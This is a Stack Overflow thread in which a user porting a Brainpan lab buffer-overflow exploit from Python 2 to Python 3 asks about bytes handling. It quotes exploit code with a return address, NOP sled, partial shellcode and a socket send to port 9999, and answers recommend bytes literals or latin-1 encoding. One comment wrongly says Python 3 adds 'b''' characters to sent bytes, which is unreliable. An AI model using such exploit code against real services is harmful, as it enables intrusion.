3

I am trying to use python3 instead of Python 2 to push a buffer overflow to Brainpan. Problem is python3 converts the bytes way differently. Does anyone know how to push the bytes In a simple way in python3 format?

Example code of the python2 code can be found at: http://blog.pentests.pl/2014/06/pentest-lab-brainpan-probably-the-fastest.html?m=1

Taken from page:

import sys,socket

eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
buf = "\x90"*10 #nop sled
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf... {Code snipped}

payload = ("a"*524) + eip + buf

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('192.168.0.xxx', 9999)

print s.recv(1024)
s.send(payload)
print s.recv(1024)

I've tried s.send(payload.encode()) with various encodings. Nothing works as far as I can tell.

Improve this question
2
  • what do you mean when you say it sends "way different" it should not ... one thing it does require is bytes instead of str though ... so i would hazard a guess it didnt send at all ... try s.send(bytes(payload)) Commented Aug 21, 2019 at 6:05
  • 1
    eip = "\xf3\x12\x17\x31" is not bytes, it is a str. Use actual bytes objects, so here you could do: eip = b"\xf3\x12\x17\x31", notice the b for a bytes literal. Commented Aug 21, 2019 at 6:08

2 Answers 2

Reset to default
3

Try using bytes literals such as

eip = b"\xf3\x12\x17\x31"
buf = b"\x90"*10
buf += b"\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"

and bypass the need for encoding altogether.

Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

If appending is done a lot and not just in this one line, bytearray will be much more efficient.
I tried this with no go. But I will try again tonight during my next practice session.
I swear I tried this and it didn't work. Anyhow I just retried and it totally worked. Thank you.
after more research this DOESN'T work (technically) as python3 adds the b'' header parts around the text, so you get 2 extra bytes at the beginning and 1 at the end.
0

I had the same error but in addition found that any character after \x7F was mangled after the bad character testing; Python 3 seem to insert random \xC2 or \xC3 before each char. What worked was to either use byte literals throughout or .encode('latin-1'). There's feedback that latin-1 encoding doesn't always work, see here, but I didn't encounter issues with byte literals.

EDIT: You might find these usefull too. Both use Latin-1 encoding for Python 3. http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Software/Buffer_Overflow/Buffer_Overflow.pdf https://blog.lab26.net/vulnerable-vm-walkthrough-brainpan-1-binary-exploitation/

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.